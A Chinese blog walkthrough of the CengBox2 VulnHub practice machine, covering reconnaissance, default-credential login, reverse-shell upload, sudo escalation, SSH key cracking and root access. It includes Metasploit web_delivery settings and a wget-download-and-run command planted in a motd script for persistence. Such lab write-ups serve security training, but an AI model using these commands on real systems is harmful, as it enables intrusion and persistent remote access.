cengbox2靶机

最新推荐文章于 2023-03-23 17:03:48 发布
最新推荐文章于 2023-03-23 17:03:48 发布
阅读量258 收藏
点赞数
分类专栏: 靶机 文章标签: shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/118513505
版权

cengbox2靶机

扫描不到靶机IP地址,教程

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.138 扫描端口

访问80端口

扫描目录,并无可用

ftp匿名登录

依然没有有用的信息,不过既然靶机作者给出了提示,那么突破点就应该在网页上。

考虑到ceng-company.vm是一级域名,而绝大多数网站都是通过二级域名访问的,例如www.sogou.com、blog.csdn.net等。因此考虑在ceng-company.vm前加上前缀,组成二级域名,看网站是否有不同的响应。(忘记截图,盗用大佬的图)

扫描二级目录admin.ceng-company.vm发现有gila目录

存在admin.ceng-company.vm/gila/admin

由于note.txt中给出了提示,Kevin的账号是使用默认密码初始化的,尝试E-mail为kevin@ceng-company.vm,密码为admin登录。

登录成功后网页又跳转到初始页面,那么就试试admin页面。

查看页面内容后发现Content -> File Manager可以上传文件

看到有个tmp文件夹,发现这个文件夹能够成功上传反弹shell的脚本,但是这里有个.htacccess文件做了限制,直接把内容删除就行了,本地开启监听,访问页面,成功接收到反弹的shell

访问shell.php

获得shell

使用sudo -l显示出自己(执行 sudo 的使用者)的权限,发现可以无密码使用swartz身份执行/home/swartz/runphp.sh

使用php提权到swartz

sudo -u swartz /home/swartz/runphp.sh

system("/bin/bash");

在home目录下发现了另一个用户文件夹,并且有权限进行查看,发现了个.ssh文件夹,里面有个id_rsa文件,可以放到本地进行破解保存密码,然后使用该私钥进行登录

保存到本地

获得密码

登录

获得flag

find / -type f -perm -g+rwx 2>/dev/null

有写权限,直接就将反弹shell的一句话写入到其目录下的一个脚本文件中,使用msf生成文件

use exploit/multi/script/web_delivery 
set target 6
set payload linux/x64/meterpreter/reverse_tcp
set lhost x.x.x.138
set lport 5555
run

echo "wget -qO WfRkW6wz --no-check-certificate http://x.x.x.138:8080/eml0ukKUyXRyfL; chmod +x WfRkW6wz; ./WfRkW6wz& disown" >> /etc/update-motd.d/00-header

退出重新ssh连接一下,成功产生session,查看家目录下的root.txt文件,拿到最后的flag

获得flag

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cengBox 2 靶机 wp
m0_52496313的博客
10-12 930
cengBox 2 靶机 wp
VulnHub CengBox2靶机渗透
Jonah_Bare的博客
06-23 723
​转载至自家微信公众号 难度评级:☆☆☆☆官网地址:https://download.vulnhub.com/cengbox/CengBox2.ova天翼云盘:https://cloud.189.cn/t/nq6r6jQVRZBz百度网盘:https://pan.baidu.com/s/1EMIZg3x2ebqOdRmif4O2Jg 提取码:gt6g官网简介:Ceng Company似乎正在维护,但仍可能运行着某些业务渗透目标:获取普通用户以及root用户权限本机地址:192.168.110.27靶机
vulnhub靶机-cengbox2
臭nana的博客
06-25 602
vulnhub靶机-cengbox2
cengbox2靶机(hydra爆破、公私钥免密登录)
m0_66299232的博客
12-06 544
靶机链接:百度网盘 请输入提取码提取码:zdpr虚拟机网络链接模式:桥接模式攻击机系统:kali linux 2021.11.arp-scan -l探测目标靶机ip2.nmap -p- -A -T4 192.168.1.107探测目标靶机开放端口和服务3.gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirb/big.txt -t 50用gobuster扫描目录,啥也没有1.登录ftp,将note.txt下载下来2.得到俩个名字ke
vulnhub:CengBox2靶机
qq_43884092的博客
01-23 243
ftp匿名登录发现note.txt,收集到两个用户:Kevin、Aaron,文件内容提示网站域名为ceng-company.vm,并且给kevin用户创建了一个新的子域,修改hosts文件并进行子域名爆破,删除tmp/.htaccess的内容,上传shell,切换到swartz用户之后,发现/home/mitnick/.ssh存放有mitnick用户的私钥,
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub-Cengbox2
qq_41810304的博客
06-20 390
前言: kali:192.168.1.4 目标机:192.168.1.35 信息收集: 漏洞挖据: 从扫描信息来看,ftp可以匿名登录,登录后获取文件note.txt,内容如下: 这是个提示,ceng-company.vm是个域名。先IP访问后,页面如下: 分析源码也没有任何用处,爆破文件,也没有任何收获(图略)。修改host文件,添加如下: 访问后依然如上图,爆破文件依然没有收获。既然有域名,会不会存在子域名,注意,不要使用subDomainsBrute,它是真的去DN
Vulnhub-cengbox2
dahege666的博客
05-24 240
靶机IP:192.168.1.8 攻击机IP:192.168.1.5 1、扫描靶机查看开放端口及服务,21、22、80端口 2、访问80端口没发现有用的信息 3、匿名登陆ftp找打一个txt文件,提示中有一个站点被移动到了ceng-company.vm域名上,设置hosts文件然后可访问(linux和windows都绑定) 4、域名绑定后进行子域名扫描,找到admin.ceng-compang.vm,但是访问为403 5、对子域名进行目录扫描,找到gila目录,后台路径为
cengbox1靶机
小小猪的博客
07-03 278
cengbox1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.136 扫描端口信息 访问80端口 对80端口进行爆破 发现登录界面 进行burp抓包 进行sqlmap爆破,sqlmap -r 4.txt --dbs,爆破出数据库 爆破出表 爆破出列 爆破出用户名和密码 登录,发现上传点 只能上传图片 制造后门 上传成功 msf进行监听 访问上传文件,反弹.
cengBox靶机wp
m0_52496313的博客
08-05 379
cengBox靶机wp
Vulnhub靶机--Cengbox
Tauil的博客
08-13 642
使用该账号密码进行登录,发现是一个文件上传的php文件,上传任意内容,发现只能上传他指定的ceng文件类型。但是该处存在一个解析漏洞,会将ceng文件解析成php文件,所以上传包含以下内容的ceng文件。界面,输入任意内容,打开 burpsuite 进行抓包,将数据包保存下来。文件夹,猜测一个是上传到该处,访问该处的文件,文件正常。应该是一个管理员登录界面,后面可以看到网站主页是。进行php文件细致的探测,输入命令。尝试ssh连接,密码就是之前获得的。,查看后台进程,文件获取地址。获得大致目录,推测目录。.
CengBox2渗透笔记】
最新发布
勿山几已
03-23 283
本文仅用于技术讨论与研究,不做任何导向,对于所有笔记中复现的这些终端、服务器或者实验环境,均为自行搭建的公开靶场,请勿在现实环境中模仿、操作。本文涉及到的工具仅就用到的方面做简要描述,如果想了解更详细的信息,请自行参阅其他技术资料。如果列出的技术用于其他任何目标,作者概不负责。
cengbox靶机(SQL注入、文件上传漏洞)
m0_66299232的博客
11-23 554
将python -c 后面的利用即可因为md5check.py文件本身就是python脚本。4.抓包后看到提示,让上传一个后缀为ceng的文件,那就把木马改成weiqin.ceng。用SHELL=bash script -q /dev/null 回弹 ,还是上传我们的php-reverse-shell.php 文件,7.开启监听成功反弹shell 发现是root 成功拿下!2.发现‘or 1=1--' 可以注入成功 并且登录进去。7.回弹shell成功,发现是一个普通用户。SQL注入、文件上传漏洞
vulnhub靶机-cengbox
臭nana的博客
06-23 1244
1、使用netdiscover扫描一下靶机ip:192.168.0.107 2、nmap扫描一下目标开放端口:22、80 3、访问80端口,没什么有用的信息,直接用kali自带的dirb扫描目录 dirb http://192.168.0.107 /usr/share/wordlists/dirb/big.txt 4、看着masteradmin和uploads两个目录有点可疑,猜测masteradmin应该是管理后台,uploads应该是个保存上传文件的目录,应该是需要上传文件,两个直
CyberSploit:1
小小猪的博客
10-28 1576
上传linpeas.sh进行漏洞发现,linpeas.sh自行在github上面下载。登录ssh,密码是flag1,查看到flag2。nmap扫描服务以及端口,发现80和22。扫描目录,发现robots.txt文件。进行解密,得到flag2。进行base64解密。得到第三个flag3。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值